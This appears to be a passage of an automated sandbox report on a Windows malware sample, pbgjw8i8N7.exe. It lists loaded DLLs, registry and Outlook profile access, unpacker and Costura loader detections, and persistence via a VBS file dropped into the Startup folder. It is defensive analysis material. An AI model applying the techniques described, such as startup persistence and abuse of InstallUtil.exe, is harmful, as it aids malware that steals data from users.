                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: pbgjw8i8N7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: pbgjw8i8N7.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: pbgjw8i8N7.exeStatic file information: File size 2034176 > 1048576
                      Source: pbgjw8i8N7.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1f0000
                      Source: pbgjw8i8N7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: pbgjw8i8N7.exe, EncryptorIterator.cs.Net Code: PresentEncryptor System.AppDomain.Load(byte[])
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.5380000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.5380000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1353040747.0000000005380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E94FE1 push ss; iretd 0_2_04E94FE2
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_05121D72 push ss; retf 0_2_05121D73
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0512A992 push edx; iretd 0_2_0512A995
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0512D84A push eax; ret 0_2_0512D881
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0512260B push cs; retf 0_2_05122611
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051EED5B pushfd ; iretd 0_2_051EED61
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051EB45F push es; iretd 0_2_051EB461
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E0722 push E9FFFFFFh; ret 0_2_051E0728
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051EF1C6 push eax; iretd 0_2_051EF1C7
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051EA84E push 928D24B0h; retf 0_2_051EA85B
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_05268404 pushad ; iretd 0_2_05268405
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_052683AA pushad ; iretd 0_2_052683AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE28B0 push ds; iretd 1_2_00CE28BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE6C10 pushfd ; iretd 1_2_00CE6C1A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE3068 push ss; iretd 1_2_00CE3076
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE3020 push ss; iretd 1_2_00CE3046
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CEF7CC push ebp; iretd 1_2_00CEF7CE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE3890 push ds; iretd 1_2_00CE3896
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE3A42 push ds; iretd 1_2_00CE3A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE7DA1 push es; ret 1_2_00CE7DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B8445 push es; ret 1_2_064B8448
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BC0FD push es; iretd 1_2_064BC210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B851A push es; ret 1_2_064B8520
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B2512 push esp; ret 1_2_064B2519
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B25B0 pushfd ; ret 1_2_064B25B1
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_0506CC4D push 73E8050Ah; iretd 3_2_0506CC52
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05064FE1 push ss; iretd 3_2_05064FE2
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_0506E09C push ebx; iretd 3_2_0506E09D
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_0506E234 push edx; iretd 3_2_0506E235
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_051BA992 push edx; iretd 3_2_051BA995
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_0527B45F push es; iretd 3_2_0527B461
                      Source: pbgjw8i8N7.exeStatic PE information: section name: .text entropy: 7.19209181797832
                      Source: XsdType.exe.0.drStatic PE information: section name: .text entropy: 7.19209181797832
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeFile created: C:\Users\user\AppData\Roaming\XsdType.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops VBS files to the startup folder
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbsJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbsJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
